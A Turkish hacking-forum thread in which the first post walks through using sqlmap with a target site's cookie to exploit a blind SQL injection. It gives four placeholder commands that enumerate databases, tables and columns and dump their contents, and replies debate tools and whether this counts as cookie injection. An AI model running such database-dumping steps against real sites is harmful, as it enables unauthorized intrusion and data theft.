İPUCU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

Seçenekler

Blind SQL & Cookie İnjection Açığı Kullanımı (Video)

meteduman - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2019
Nereden:
İzmir
Mesajlar:
34
Konular:
1
Teşekkür (Etti):
1
Teşekkür (Aldı):
5
Ticaret:
(0) %
28-03-2019 16:35
#1
Blind SQL & Cookie İnjection Açığı Kullanımı (Video)


İstek Üzerine yazılı kısa bir anlatım yapacagım arkadaşlar.
Hedef sitemizin cookie'sini çektiğinizi ve blind SQL-i açığını buldugunuzu varsayarak anlatımıma geçiyorum.Aslında tek yaptıgımız şey --cookie parametresi ile hedef sitenin cookiesini tanımlayıp blind açığımız ile hedef sitemizin veritabanına sızmaktı..

Peki nasıl yaptık ?


Burada cookie bilgisini ve Blind SQL-i açığını tanımladık ve veritabanını çektik.

Kod:
sqlmap --cookie="cookiebilgisi" -u "Blind SQL-i" --dbs

Burada çektiğimiz veritabanının içerisindeki tableları çektik.

Kod:
sqlmap --cookie="cookiebilgisi" -u "Blind SQL-i" -D database --Tables

Burada tableların içerisindeki Column'ları çektik.

Kod:
sqlmap --cookie="cookiebilgisi" -u "Blind SQL-i" -D database -T tables --columns

Son olarak columnlarımızın içerisindeki bilgiyi çekiyoruz.

Kod:
sqlmap --cookie="cookiebilgisi" -u "Blind SQL-i" -D database -T tables -C columns --dump



Anlamadıgınız olursa sorabilirsiniz.

Teşekkür Ederim.
Konu meteduman tarafından (28-03-2019 20:05 Saat 20:05 ) değiştirilmiştir.
Kacamax, nessina, Nems Teşekkür etti.
korkusuzhacker2 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2019
Nereden:
KONYA
Mesajlar:
75
Konular:
29
Teşekkür (Etti):
7
Teşekkür (Aldı):
5
Ticaret:
(0) %
28-03-2019 17:47
#2
Devrem
Havij kullanirsan daha çok işine yarar
meteduman - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2019
Nereden:
İzmir
Mesajlar:
34
Konular:
1
Teşekkür (Etti):
1
Teşekkür (Aldı):
5
Ticaret:
(0) %
28-03-2019 17:52
#3
Alıntı:
korkusuzhacker2´isimli üyeden Alıntı Mesajı göster
Devrem
Havij kullanirsan daha çok işine yarar

Video eğitim amaçlı kardom bilmeyenleri bilgilendirmek amacıyla çektiğim bir video bu ayrıca bu yöntemi havijle yapabiliceğine inanıyormusun
"PurpposoLes - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2016
Nereden:
DataBase
Mesajlar:
3.260
Konular:
263
Teşekkür (Etti):
915
Teşekkür (Aldı):
1070
Ticaret:
(0) %
28-03-2019 17:56
#4
Alıntı:
meteduman´isimli üyeden Alıntı Mesajı göster
Video eğitim amaçlı kardom bilmeyenleri bilgilendirmek amacıyla çektiğim bir video bu ayrıca bu yöntemi havijle yapabiliceğine inanıyormusun
Havij mi ? keşke cookies i nasıl çektiğini gösterseydin bilmeyenler veya soranlar olabilir
---------------------
ɱყ ŋąɱɛ ıʂ "℘ųཞ℘℘ơʂơƖɛʂ
ı'ɱ ą ცƖąƈƙ ɧąɬ

Öʅüɱʂüȥ αşƙʅαɾ ʋαɾԃα, öʅɱҽყҽɳ αşıƙ ʋαɾ ɱı?

єѕкι αηкα тιмι αѕιѕтαηı..

@the_purpp
Konu PALA tarafından (29-03-2019 00:50 Saat 00:50 ) değiştirilmiştir.
meteduman - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2019
Nereden:
İzmir
Mesajlar:
34
Konular:
1
Teşekkür (Etti):
1
Teşekkür (Aldı):
5
Ticaret:
(0) %
28-03-2019 18:11
#5
Alıntı:
PurpposoLes;8715985][COLOR="White´isimli üyeden Alıntı
Havij mi ? Konu güzel olmuş keşke cookies i nasıl çektiğini gösterseydin bilmeyenler veya soranlar olabilir emeğine sağlık. [/COLOR]

Teşekkür ederim bilgi analizleri için kullanılan programlar ve manuel açık kullanımları için ayrı bir video çekeceğim için göstermedim ama yeni video birkaç güne gelecek inşallah.
RuinHeart - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2019
Mesajlar:
1
Konular:
0
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Ticaret:
(0) %
28-03-2019 18:40
#6
Get parametresine atak yapmışsın dostum,cookie injection değil bu.Cookie injection dediğin zaman Cookie Parametresine Sql Payloadları Yazarsın ve Responsede dönen sonuçları incelersin.Sen sadece burda Cookie bilgisi girerek get parametresinden veritabınına ulaşmışsın.
meteduman - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2019
Nereden:
İzmir
Mesajlar:
34
Konular:
1
Teşekkür (Etti):
1
Teşekkür (Aldı):
5
Ticaret:
(0) %
28-03-2019 19:38
#7
Alıntı:
RuinHeart´isimli üyeden Alıntı Mesajı göster
Get parametresine atak yapmışsın dostum,cookie injection değil bu.Cookie injection dediğin zaman Cookie Parametresine Sql Payloadları Yazarsın ve Responsede dönen sonuçları incelersin.Sen sadece burda Cookie bilgisi girerek get parametresinden veritabınına ulaşmışsın.

Senin bahsettiğin şey ile benim yaptıgım şey alakasız şeyler bahsettiğini anladım fakat bu yöntemede cookie injection deniyor bazı kaynaklarda bana ne yaptıgımı anlatmana gerek yok yani yapıp videosunu çektiğime göre ne yaptıgımıda biliyorum demekki değil mi kardom ?
cewl - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Merdekan
Yaş:
24
Mesajlar:
2.768
Konular:
178
Teşekkür (Etti):
0
Teşekkür (Aldı):
756
Ticaret:
(0) %
28-03-2019 19:47
#8
merhaba konu gozel lap gozel olacakdi amma olmadi bi dusun yazili anlatsan bu videonuda alta eklesen ne kadar guzel olr dimi (:
meteduman - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2019
Nereden:
İzmir
Mesajlar:
34
Konular:
1
Teşekkür (Etti):
1
Teşekkür (Aldı):
5
Ticaret:
(0) %
28-03-2019 20:08
#9
Alıntı:
cewl´isimli üyeden Alıntı Mesajı göster
merhaba konu gozel lap gozel olacakdi amma olmadi bi dusun yazili anlatsan bu videonuda alta eklesen ne kadar guzel olr dimi (:

Yazılı Anlatım eklendi .
Konu PALA tarafından (28-03-2019 21:00 Saat 21:00 ) değiştirilmiştir.
nessina Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı